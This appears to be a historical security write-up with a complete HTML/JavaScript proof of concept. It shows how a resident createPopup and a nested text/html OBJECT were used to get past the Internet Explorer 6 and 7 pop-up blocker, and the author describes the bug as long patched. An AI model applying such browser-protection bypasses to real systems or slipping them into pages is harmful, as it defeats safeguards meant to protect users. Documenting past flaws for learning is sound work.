Popup Bypass Using createPopup and Object

This combines the residency trick with the nested-object popup bypass. A createPopup made resident inside an IFRAME survives the IFRAME navigating away. After the navigation, an OBJECT TYPE="text/html" is written into the popup, and calling open() from that object’s parentWindow bypasses the blocker on both IE6 and IE7.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head>
<title>Yet another popUp Blocker Bypass. This time, using a createPopup and an OBJECT</title></head>
<body>
<font face="Tahoma" size="2">
<h3>PopUp Blocker Bypass (IE6 and IE7) using createPopup and OBJECT tag</h3>
1) Create a resident createPopup (inside an IFRAME).<br />
2) Change the URL of the IFRAME (wait and make sure it changed).<br />
3) Write (after the URL changed) an OBJECT TYPE="text/html" inside the resident popUp.<br />
4) Use the open method from that object: myObj.object.parentWindow.open()<br /><br /><br />
</font>
<iframe name="createPopup_Container"></iframe>

<script language="JavaScript">
function retCode(m){m+='';return m=m.substring(m.indexOf('{')+1,m.lastIndexOf('}'));}
function popUpCode()
{
	var objectWindow;

	function writeObjectAfterWeLeaveThePage()
	{
		try
		{
			var myParentDocument=parent.document;
			setTimeout('writeObjectAfterWeLeaveThePage()',100);
		}
		catch(e)
		{
			document.body.innerHTML='<object id="myObj" type="text/html" data="no_file_required.html"></object>';
			setTimeout('waitObjectToBeReady()',100);
		}
	}
	function waitObjectToBeReady()
	{
		try 
		{
			objectWindow=document.all.myObj.object.parentWindow;
			openWindow();
		}
		catch(e)
		{
			setTimeout('waitObjectToBeReady()',100);
		}
	}
	function openWindow()
	{
		objectWindow.open("http://www.google.com","mac","width=300,height=300");
	}

	writeObjectAfterWeLeaveThePage();
}

//	This next IFRAME is not connected with the code at all. We need it there to make the createPopup resident.
createPopup_Container.document.write('<iframe src="nofile.html" width="100" height="100"></iframe>');
createPopup_Container.document.close();
var myPop=createPopup_Container.createPopup().document;
myPop.body.innerHTML='.<script defer="defer">'+retCode(popUpCode)+'<\/script>';
myPop.parentWindow.myPop=myPop;
setTimeout('createPopup_Container.location.replace("http://www.altavista.com/")',3000);

</script>
</body>
</html>

The resident popup detects when its parent has navigated away by catching the access violation thrown when parent.document becomes inaccessible. At that point it writes a text/html OBJECT inside itself and calls open() from the object’s parentWindow. This extra layer of indirection provides the trust bypass that makes the pop-up blocker step aside.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.